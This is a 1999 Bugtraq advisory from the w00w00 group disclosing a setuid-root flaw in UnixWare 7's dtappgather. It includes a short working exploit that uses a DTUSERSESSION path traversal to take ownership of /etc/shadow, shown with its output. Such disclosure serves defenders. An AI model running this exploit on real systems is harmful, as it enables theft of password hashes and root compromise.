Date: Wed, 3 Nov 1999 10:51:52 -0800 (PST) From: Sangfroid Subject: bugtraq post Introduction to w00giving '99 RFP's most excellent 0kt0berfest commitment to working for everyman to make the world more secure, caused w00w00 to stop and give thought to our collective contribution to the world of computer security. Finding ourselves lacking in the past few months, our hearts were pricked and we were driven to repentance. Being the month of thankfulness for all we have received this year, w00w00 looked back and found many things to give back to the computer security community. ============================================================ To celebrate the upcoming mass-destruction and world-wide chaos in 2000, w00w00 Security Development (WSD) will be releasing many advisories depending on vendor's timely responses. The severity of each vulnerability will outweigh the previously posted one, so keep your eyes out! If all goes according to plan, w00giving '99 will close with its largest vulnerability on Jan. 1, 2000, aka w00mageddon. Note: eEye Digital Security is also participating with us to independently release NT tools and vulnerabilities within the next few weeks. w00w00, eEye, rfp, technotronic, wiretrip ====================================================== w00giving '99 Let the games begin... ====================================================== Vendors should review available best practice guidelines on secure programming techniques. Should they have done so in this instance, they would have instantly recognized the security issue we discovered. We also understand it's much easier to audit code post-release, and realize the underpaid coders are pushed to market by marketing monkeys and management that do not represent secure programming techniques. MANAGER NOTE: ====================================================== THIS IS IMPORTANT, SORRY ABOUT THE LACK OF POWER POINT PRESENTATION! "GIVE YOUR CODERS MORE MONEY AND TIME!" ====================================================== END OF MANAGER NOTE, GO BACK TO YOUR MEETING. Note: All you really have to do to find bugs like this is use some application like strace, ktrace, or truss(depending on your operating environmen) and look for suspect calls. For instance, if you see a call to getenv() and then the value of the environment variable mysteriously showing up in an open() call, there is probably something wrong here. Pay strict attention, you will see this material again. ====================================================== UnixWare 7's dtappgather Discovered by: K2 (ktwo@ktwo.ca) UnixWare 7's dtappgather runs with superuser privileges, but improperly check $DTUSERSESSION to ensure that the file is readable/writeable or owned by the user running it. --------------------------------------------------------------------------- Exploit: rain:/usr/dt/bin$ export DTUSERSESSION=../../../../etc/shadow rain:/usr/dt/bin$ ./dtappgather MakeDirectory: /var/dt/appconfig/appmanager/../../../../etc/shadow: File exists rain:/usr/dt/bin$ ls -la /etc/shadow -r-xr-xr-x 1 ktwo other 358 Oct 26 04:37 /etc/shadow* --------------------------------------------------------------------------- Patch: Because SCO doesn't release source for UnixWare, we must wait for them to provide one. --------------------------------------------------------------------------- Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum, and interrupt People who deserve hellos: nocarrier, minus, daveg, nny, marc, and w00god blake w00w00 Security Development (WSD) [See http://www.datasurge.net/www.w00w00.org, the official mirror, until relocation of w00w00.org is complete]